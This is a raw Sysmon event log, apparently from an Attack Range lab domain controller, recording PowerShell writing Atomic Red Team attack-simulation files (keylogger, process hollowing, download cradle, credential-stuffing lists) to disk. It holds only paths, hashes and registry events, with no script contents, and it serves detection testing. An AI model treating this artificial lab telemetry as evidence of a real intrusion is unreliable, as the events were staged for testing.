11241100x800000000000000024392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:42.103{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\bin\T1036.003.exe2021-06-23 21:08:42.103 11241100x800000000000000024409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.931{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.001\src\Get-Keystrokes.ps12021-06-23 21:08:43.931 11241100x800000000000000024408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.853{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055\src\x64\T1055-macrocode.txt2021-06-23 21:08:43.853 11241100x800000000000000024407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.759{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.012\src\T1055.012-macrocode.txt2021-06-23 21:08:43.759 23542300x800000000000000024406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.759{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E75E26C9B0A2F7608ADF387AD106B20,SHA256=D805F7F5E94F6286F36E99E632C6D76C88A08F2B088248E9ED5FA3FE83762645,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.743{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.012\src\Start-Hollow.ps12021-06-23 21:08:43.743 11241100x800000000000000024404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:43.665{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.004\src\x64\T1055.dll2021-06-23 21:08:43.665 11241100x800000000000000024403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:43.634{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.004\src\Win32\T1055.dll2021-06-23 21:08:43.634 11241100x800000000000000024402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:43.525{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.004\bin\T1055.exe2021-06-23 21:08:43.525 11241100x800000000000000024401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:43.446{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.001\src\x64\T1055.001.dll2021-06-23 21:08:43.446 11241100x800000000000000024400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:43.415{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1055.001\src\Win32\T1055.001.dll2021-06-23 21:08:43.415 11241100x800000000000000024399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.165{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1053.005\src\T1053.005-macrocode.txt2021-06-23 21:08:43.165 23542300x800000000000000024398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.134{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=34BF6B9AE7E421B4A30B8F2F4C616894,SHA256=15BBE125B45AEC6B301C12C3C735FFAEBCA82047720E4917F706CE0B8B0AA88C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:43.134{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F82AD1B836ACCBF9BC560077BE450790,SHA256=911B40EF7071ABC206F9DE0002D704431B4E038C4AAE6683435B568DD6B6B181,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.931{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1070.001\src\T1070.001-macrocode.txt2021-06-23 21:08:44.931 23542300x800000000000000024422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.743{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9B526D769BC8B7FFCA61722E2D676DA1,SHA256=E17D871D80D1731AD43EA12C9A08E52AF267DA805A2DA61B1B3BF3943ACA1180,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.712{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.005\src\sys_info.vbs2021-06-23 21:08:44.712 11241100x800000000000000024420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.696{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.005\src\T1059_005-macrocode.txt2021-06-23 21:08:44.696 11241100x800000000000000024419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.681{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.005\src\T1059.005-macrocode.txt2021-06-23 21:08:44.681 11241100x800000000000000024418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.384{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.001\src\test.ps12021-06-23 21:08:44.384 11241100x800000000000000024417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.353{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1059.001\src\Invoke-DownloadCradle.ps12021-06-23 21:08:44.353 11241100x800000000000000024416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:44.228{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\x64\T1056.004.dll2021-06-23 21:08:44.228 11241100x800000000000000024415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:44.196{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\Win32\T1056.004.dll2021-06-23 21:08:44.196 23542300x800000000000000024414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.165{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=543AEDCA6606E1C2C2868360AACE7C61,SHA256=E6BF8C8AB45636328BC9022F2AF92B264CC006FA5076E8951FFDC5F4A5E79B15,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.134{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\T1056.004\T1056.004.vcxproj2021-06-23 21:08:44.134 11241100x800000000000000024412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:44.087{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\src\T1056.004.sln2021-06-23 21:08:44.087 11241100x800000000000000024411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:44.056{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\bin\T1056.004x86.dll2021-06-23 21:08:44.056 11241100x800000000000000024410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:44.040{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1056.004\bin\T1056.004x64.dll2021-06-23 21:08:44.040 23542300x800000000000000024431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.993{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=394DD8ABF1D76537BCEC447C7CA23BBB,SHA256=6945F6761749B826ED03158FA034FD2DB82A8A3BA198CABFB190450004DC6FF1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:45.899{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1087.002\src\AdFind.exe2021-06-23 21:08:45.899 11241100x800000000000000024429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.728{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1082\src\griffon_recon.vbs2021-06-23 21:08:45.728 11241100x800000000000000024428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.540{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1074.001\src\Discovery.bat2021-06-23 21:08:45.540 11241100x800000000000000024427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.509{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1074.001\bin\Folder_to_zip\T1074.txt2021-06-23 21:08:45.509 11241100x800000000000000024426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.368{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1071.004\src\T1071-dns-domain-length.ps12021-06-23 21:08:45.368 11241100x800000000000000024425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.353{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1071.004\src\T1071-dns-beacon.ps12021-06-23 21:08:45.353 23542300x800000000000000024424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:45.212{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B353CD4059DCE316B49BDFC7F186578,SHA256=6A301EB6711A97A4CE7852202CBD1AEAF222A9472D102A0ADCA58714D331B58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.978{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FEBEA5FF41C607770AD5EDC032CAC89E,SHA256=5445210A61540B18EE9D6BAAB6E6E53A4C42EE7153BC8F9B2C053B9636B64E1F,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.790{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1115\src\T1115-macrocode.txt2021-06-23 21:08:46.790 11241100x800000000000000024436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.696{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1114.001\src\Get-Inbox.ps12021-06-23 21:08:46.696 11241100x800000000000000024435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.542{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1110.004\src\credstuffuserpass.txt2021-06-23 21:08:46.542 11241100x800000000000000024434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.462{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1110.003\src\parse_net_users.bat2021-06-23 21:08:46.462 11241100x800000000000000024433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.368{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1110.002\src\sam.txt2021-06-23 21:08:46.368 23542300x800000000000000024432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:46.212{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF91CFEC698AA3371D95BCC78F6FF22,SHA256=773FCCDFEDEDED48E340110243BD17DBD497056EAB88AFF954B658AD08C9DAF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.978{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=785BF807B58225CB50F1F8F80397DC47,SHA256=A0C78174FAB443B533D266CDA9D1485B0A9858F707FCADE5FCBFB17C5B182B34,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.368{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1134.004\src\PPID-Spoof.ps12021-06-23 21:08:47.368 11241100x800000000000000024442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:47.337{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1134.004\bin\calc.dll2021-06-23 21:08:47.337 23542300x800000000000000024441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.290{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=258F57663B2960AF707E8DCBDA06F2D5,SHA256=F712DDD37CD19971E921C3748D0C0EBFDB8EC9896367D8146889D84BE6D84758,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.212{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1133\src\list of vpn extension.txt2021-06-23 21:08:47.212 11241100x800000000000000024439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.071{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1127.001\src\T1127.001.csproj2021-06-23 21:08:47.071 23542300x800000000000000024454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.962{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A15E8A0AB6DAD772C12F98F377BA122F,SHA256=1FEA50E82AD229D630612B8210799310750106306F0A26C9E3D1DA7373B41EBB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:48.946{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.007\src\x64\T1218.dll2021-06-23 21:08:48.946 354300x800000000000000024452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:47.112{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61507-false10.0.1.12-8000- 11241100x800000000000000024451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.790{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.005\src\powershell.ps12021-06-23 21:08:48.790 11241100x800000000000000024450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.759{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.005\src\T1218.005.hta2021-06-23 21:08:48.759 11241100x800000000000000024449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.681{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.004\src\InstallUtilTestHarness.ps12021-06-23 21:08:48.681 11241100x800000000000000024448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.384{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.001\src\T1218.001.chm2021-06-23 21:08:48.384 23542300x800000000000000024447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.321{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0315EB2F84DEBC1C043C5535A24C8508,SHA256=3049C5035D5E47DF72207CCC3F4C30ACB3CAFEBC1A2E83AB707A79F6DBF48370,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.087{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1204.002\src\payload.txt2021-06-23 21:08:48.087 11241100x800000000000000024445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:48.071{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1204.002\src\chromeexec-macrocode.txt2021-06-23 21:08:48.071 11241100x800000000000000024475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.946{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1221\src\readme.txt2021-06-23 21:08:49.946 23542300x800000000000000024474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.946{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1E2DAE8C305DCF63EDE8522B7C826C95,SHA256=001A920C594E27B6E2C5A46AE24BD04077E5C77D5D7855382F097EF75AAC7F94,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.665{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218\src\x64\T1218.dll2021-06-23 21:08:49.665 11241100x800000000000000024472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.634{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218\src\Win32\T1218.dll2021-06-23 21:08:49.634 11241100x800000000000000024471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.618{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll2021-06-23 21:08:49.618 13241300x800000000000000024470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000024469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0013b058) 13241300x800000000000000024468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7686b-0x944fd1ce) 13241300x800000000000000024467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d76873-0xf61439ce) 13241300x800000000000000024466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7687c-0x57d8a1ce) 13241300x800000000000000024465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000024464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0013b058) 13241300x800000000000000024463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7686b-0x944fd1ce) 13241300x800000000000000024462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 